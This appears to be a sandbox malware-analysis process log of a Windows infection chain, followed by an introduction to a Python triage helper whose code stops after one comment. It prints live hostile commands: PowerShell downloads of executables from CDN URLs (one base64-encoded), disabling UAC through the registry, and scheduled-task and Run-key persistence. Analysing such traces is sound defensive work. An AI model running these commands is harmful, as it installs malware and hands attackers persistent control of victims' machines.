Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"
C:\Users\Public\Music\RunihaiVersion.exe
RunihaiVersion.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Public\Music\israil2.exe
"C:\Users\Public\Music\israil2.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\xx.exe
xx.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe
C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe
C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe
C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe
C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe
C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe
C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe
C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe
C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\jJm4qX1Ro9.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\UhDeflkK5l.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe
C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe
C:\Users\Admin\AppData\Local\Temp\jJm4qX1Ro9.exe
C:\Users\Admin\AppData\Local\Temp\jJm4qX1Ro9.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMAA5ADkANQAyADMANgAzADEAOQAzADEAMwAvAFcAaQBuAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACwAIAA8ACMAcgBoAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGEAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGQAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwBrAGUAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHIAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACkAPAAjAGgAZgB3ACMAPgA="
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"
C:\Users\Admin\AppData\Roaming\WiDefault.exe
"C:\Users\Admin\AppData\Roaming\WiDefault.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\2WinDefault.exe
"C:\Users\Admin\AppData\Roaming\2WinDefault.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1748 -ip 1748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 776
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
"C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Users\Admin\AppData\Roaming\OperaCrt.exe
"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap6908:1456:7zEvent30571 -tzip -sae -- "C:\Users\Admin\AppData\Local\Temp\Temp.zip"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x134,0x138,0x13c,0x110,0x140,0x7ff8e2349758,0x7ff8e2349768,0x7ff8e2349778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1760 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2244 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3108 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4736 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4880 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4840 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5152 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5424 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4836 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5436 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5872 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5856 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5268 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5668 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3336 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6236 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6392 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6308 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6328 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6064 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5160 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5656 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6632 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=1852 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=7172 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=7420 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=7292 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=6692 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=7788 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=1636 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=5768 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=7384 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=7980 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=7616 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=7252 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=3228 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=6572 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=6900 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=8404 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:2
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
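Added triage helper (not part of the sandbox report above): it tags the persistence and injection-host patterns visible in the process tree (a `schtasks /sc once` task that repeats every 60 minutes for 9999 hours at HIGHEST run level, an HKCU Run key rewritten with New-ItemProperty, InstallUtil/RegAsm/RegSvcs launched with no arguments as hollowing targets) and separates direct-to-IP C2 candidates from abused hosting and sandbox noise in the Network table that follows. The tag names, the rule thresholds and the `ABUSED_HOSTING` list are this example's own choices; the sample command lines and table rows are copied from this report, except the one schtasks line marked constructed, which is a benign control.

```python
import re

# Indicator lists chosen for this example (ABUSED_HOSTING is taken from the domains in the report's Network table).
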